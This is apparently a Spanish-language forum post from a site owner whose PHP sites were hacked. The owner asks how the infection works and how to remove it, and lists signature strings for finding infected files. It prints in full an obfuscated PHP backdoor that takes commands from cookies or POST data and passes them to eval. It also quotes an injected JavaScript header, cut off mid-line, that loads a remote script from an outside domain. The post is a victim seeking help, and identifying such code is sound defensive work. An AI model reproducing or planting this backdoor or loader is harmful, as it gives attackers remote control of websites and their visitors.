Hace poco nos infectamos con un hack de PHP y esperábamos que ustedes pudieran arrojar algo más de luz sobre el tema. ¿Principalmente cómo funciona este hack y cómo solucionarlo?
Nos estamos moviendo a una nueva configuración, que según nuestro anfitrión, es la mejor manera de remediar esto. Sin embargo, si podemos reducir la velocidad o detener los ataques durante la mudanza, sería mucho mejor.
Los piratas informáticos están inyectando archivos legítimos en los encabezados y creando nuevos archivos PHP, que en la mayoría de los casos contienen estas diferentes líneas de código, lo que facilita las búsquedas para encontrarlos.
$GLOBALS[$GLOBALS['
$payload = "file_put_contents
"base" . "64_decode"
Array('1'=>
= isset($
if (!defined('ALREADY_RUN
**The majority contain this code:**
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['s9b2'] = "\x76\x4f\x69\x63\x49\x6a\x66\x7c\x6c\x51\x3c\x4b\x2d\x20\x31\x29\x7b\x2c\x28\x46\x62\x52\x57\x42\x65\x45\x41\x59\x6f\x68\xa\x43\x9\x21\x3a\x61\x36\x77\x34\x7e\x7a\x5c\x2a\x3e\x71\x58\x6e\x32\x73\x27\x6b\x67\x5d\x78\x72\x44\x4a\x2e\x40\x5b\x37\x25\x38\x26\x5a\x50\x60\x3d\x3b\x56\x30\x4e\x3f\x70\x39\xd\x33\x53\x23\x2f\x22\x2b\x64\x79\x6d\x4d\x55\x7d\x5f\x75\x48\x54\x4c\x47\x35\x74\x5e\x24";
$GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][54];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]] = $GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][82];
$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][2].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][73].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][89].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]] = $GLOBALS['s9b2'][20].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]] = $GLOBALS['s9b2'][95].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][20];
$GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][44].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][3];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] = $_POST;
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] = $_COOKIE;
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51], NULL);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48], 0);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][84].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][89].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24], 0);
@$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]](0);
$qcecc0e0f = NULL;
$ide605a9 = NULL;
$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][24];
global $s5cf5021d;
function qe9001c0c($qcecc0e0f, $v42282)
{
$sbec70da = "";
for ($s11c3d0e5=0; $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f);)
{
for ($k310c1a=0; $k310c1a<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($v42282) && $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f); $k310c1a++, $s11c3d0e5++)
{
$sbec70da .= $GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]]($GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($qcecc0e0f[$s11c3d0e5]) ^ $GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($v42282[$k310c1a]));
}
}
return $sbec70da;
}
function t1db($qcecc0e0f, $v42282)
{
global $s5cf5021d;
return $GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($qcecc0e0f, $s5cf5021d), $v42282);
}
foreach ($GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] as $v42282=>$r26d29)
{
$qcecc0e0f = $r26d29;
$ide605a9 = $v42282;
}
if (!$qcecc0e0f)
{
foreach ($GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] as $v42282=>$r26d29)
{
$qcecc0e0f = $r26d29;
$ide605a9 = $v42282;
}
}
$qcecc0e0f = @$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]]($GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]]($GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]]($qcecc0e0f), $ide605a9));
if (isset($qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]]) && $s5cf5021d==$qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]])
{
if ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][2])
{
$s11c3d0e5 = Array(
$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0] => @$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]](),
$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][0] => $GLOBALS['s9b2'][14].$GLOBALS['s9b2'][57].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][14],
);
echo @$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]]($s11c3d0e5);
}
elseif ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][24])
{
eval($qcecc0e0f[$GLOBALS['s9b2'][82]]);
}
exit();
}
Nuevo ejemplo de encabezado infectado:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://solventoffertes.be/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(do
Hay alrededor de 4 variaciones diferentes, pero la GLOBALS es la más común.
¿Alguna idea sobre cómo solucionar esto y cómo funciona?